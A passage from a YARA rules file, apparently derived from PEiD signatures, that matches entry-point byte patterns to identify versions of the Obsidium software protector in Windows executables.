00 00 00 ?? EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 04 ?? ?? ?? 
?? 64 89 20 EB 01 ?? EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 01 ?? EB 03 ?? ?? ?? 64 8F 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 58 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12X_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V130X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n        $b = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 
E8 3B 26 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1334_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B ?? 24 0C EB 01 ?? 83 ?? B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1355_Obsidium_Softwarenbsp_nbsp_SignByfly_20080411: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 ?? ?? ?? ?? EB 01 ?? E8 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? 
E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1111_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1338_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1360_Obsidium_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 1F EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 03 ?? ?? ?? EB 02 ?? ?? 
8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 02 ?? ?? EB 02 ?? ?? 64 8F 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1322_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software_200800207: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 5B 28 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1336_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1258_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 
64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1336_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1322_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1353_Obsidium_Software_20080120: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? 
EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1360_Obsidium_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 1F EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 02 ?? ?? EB 02 ?? ?? 64 8F 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1341_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1334_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? 
EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1353_Obsidium_Software_SignByfly_20080120: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 }\r\n        $b = { EB 02 ?? ?? E8 2B 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Softwarenbsp_nbsp_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? 
E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V125_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1361_Obsidium_Software_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 ?? EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 01 ?? EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 01 ?? EB 03 ?? ?? ?? 64 8F 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 58 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1332_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00 }\r\n        $b = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? 
EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_vxxxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 19 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1200_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1339_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V130X_Obsidium_Software_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 
C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1304_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13017_Obsidium_software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1332_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? 